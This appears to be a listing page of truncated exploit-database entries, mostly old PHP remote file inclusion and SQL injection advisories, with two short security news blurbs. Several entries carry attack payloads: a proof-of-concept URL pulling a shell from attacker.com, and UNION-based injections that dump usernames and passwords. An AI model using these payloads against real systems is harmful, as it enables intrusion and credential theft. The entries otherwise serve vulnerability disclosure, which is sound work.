What’s most interesting about the Florida water system hack? That we heard about it at all.

Stories about computer security tend to go viral when they bridge the vast divide between geeks and luddites, and this weeks news about a hacker who tried to poison a Florida towns water supply was understandably front-page material. But for security nerds whove been warning about this sort of...

PHP-Calendar 0.10.1 - Arbitrary File Inclusion

PHP-Calendar 0.10.1 - Arbitrary File Inclusion PHP-Calendar Arbitrary File Inclusion Vendor: Sean Proctor Product: PHP-Calendar Version: = 0.10.1 Website: http://php-calendar.sourceforge.net/ BID: 12127 CVE: CVE-2004-1423 OSVDB: 12700 12701 SECUNIA: 22516 PACKETSTORM: 35563 Description: I was...

PNphpBB2 <= 1.2g - (phpbb_root_path) Remote File Include Vulnerability

No description provided by source. Yeah, another ZeroDay Smile Vendor: http://www.pnphpbb.com/ Vulnerable File: includes/functionsadmin.php Vulnerable Code: //The phpbbrootpath isn't initialize includeonce $phpbbrootpath . 'includes/functions.' . $phpEx ; Method To Use:...

kr-web <= 1.1b2 - Remote File Inclusion Vulnerability

No description provided by source. Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg KR-Web = 1.1b2 Remote File Include Vulnerability Download Script : http://sourceforge.net/projects/krw/files/ Dork : dieHacking attempt; :D Vuln : ./KR-Web-1.1b2/adm/krgourl.php line 2 ?php include...

Ecmall 2.x 多处安全漏洞汇总

简要描述： 一处通杀注入，同文件多处鸡肋注入，一处本地包含。累了不看了，体力活。。。 详细说明： 通杀注入:http://localhost/ecmall/index.php?app=mygoods&act=brandlist&order=asc&sort=1 and select username from ecmmember where userid=1 union select 1 from select count,concatfloorrand02,select concatusername,password from ecmmember limit 0,1a from...

Geohot Will Try His Hacking Skills On Windows Phone 7 !

Geohot has been causing quite a disturbance due to his ongoing legal battle with Sony. Geohot jailbroke the Sony PS3 to run unsigned code. Sony is now suing him, and Geohot is under the tech industry's spotlight more than ever. So, what does all this have to do with Windows Phone 7? Microsoft has...

PHprojekt Module CMS 0.6.1 Remote File Inclusion Vulnerability

Exploit for php platform in category web applications ============================================================== PHprojekt Module CMS 0.6.1 Remote File Inclusion Vulnerability ============================================================== Contact: bd0rkatschool-of-hack.net or...

PHP Traverse 0.8.0 Remote File Inclusion

Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg phptraverse PoC : http://0wn3d.com/path/assets/plugins/mp3id/mp3id.php?GLOBALSBASE=http://attacker.com/shell.txt?cmd Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix, dan seluruh orang yang membenciku dan menyayangiku I Love U Full : /...

Tribisur 2.0 - SQL Injection

Tribisur 2.0 - SQL Injection !/usr/bin/php -q And now the bugged code :- : So we can exploit it with this simple PoC: forum.php?action=liste&cat=-1+union+select+0,concatpseudo,0x3a,passe,0,0,0,0,0,0,0,0+from+utiliz+where+id=1 Bug 2 in catmain.php : So like the first we can exploit it with:...

Tribisur 2.0 - SQL Injection

!/usr/bin/php -q And now the bugged code :- : So we can exploit it with this simple PoC: forum.php?action=liste&cat=-1+union+select+0,concatpseudo,0x3a,passe,0,0,0,0,0,0,0,0+from+utiliz+where+id=1 Bug 2 in catmain.php : So like the first we can exploit it with:...

mxbb233-rfi.txt

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + mxBB Module mxglance 2.3.3 Remote File Include Vulnerability + + + + Discovered by bd0rk || SOH-Crew + + + + www.soh-crew.it.tt + + + + The german Coding and IT-Security Ressource + + +...

mxBB Module mx_glance 2.3.3 - Remote File Inclusion

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + mxBB Module mxglance 2.3.3 Remote File Include Vulnerability + + + + Discovered by bd0rk || SOH-Crew + + + + www.soh-crew.it.tt + + + + The german Coding and IT-Security Ressource + + +...

phpbbxtra20-rfi.txt

----------------------------------------------- PhpbbXtra v2.0 phpbbrootpath Remote File Include Vulnerability ----------------------------------------------- Author: xoron ----------------------------------------------- Vuln Code: include$phpbbrootpath . 'includes/bbcode.'.$phpEx;...

mxBB Module ErrorDocs 1.0 - common.php Remote File Inclusion

mxBB Module ErrorDocs 1.0 - common.php Remote File Inclusion = mxBB Module mxerrordocs 1.0 Remote File Include Vulnerability = Mod-Download: http://forums.phpmix.org/download.php?id=27 = Bugfounder: bd0rk || SOH-Crew = Vulnerable code in common.php = Greetings: str0ke, broken-error, Martn & m0rph...

PNphpBB.txt

Vendor: http://www.pnphpbb.com/ Vulnerable File: includes/functionsadmin.php Vulnerable Code: //The phpbbrootpath isn't initialize includeonce $phpbbrootpath . 'includes/functions.' . $phpEx ; Method To Use:...

Mambo Component CopperminePhotoGalery - Remote File Inclusion

Mambo Component CopperminePhotoGalery - Remote File Inclusion CopperminePhotoGallery Component Found By k1tk4t Indonesia This bug allows a remote atacker to execute commands via RFI file: cpg.php bug: require $mosConfigabsolutepath."/administrator/components/comcpg/config.cpg.php"; path: add in...

AutoLinks Pro 2.1

NewAngels Advisory 1 AutoLinks Pro 2.1 - Remote File Include Vulnerability ============================================================================= Software: AutoLinks Pro Version: 2.1 Type: Remote PHP File Include Vulnerability Risc: High Date: 16.08.05 Vendor: ScriptsCenter Page:...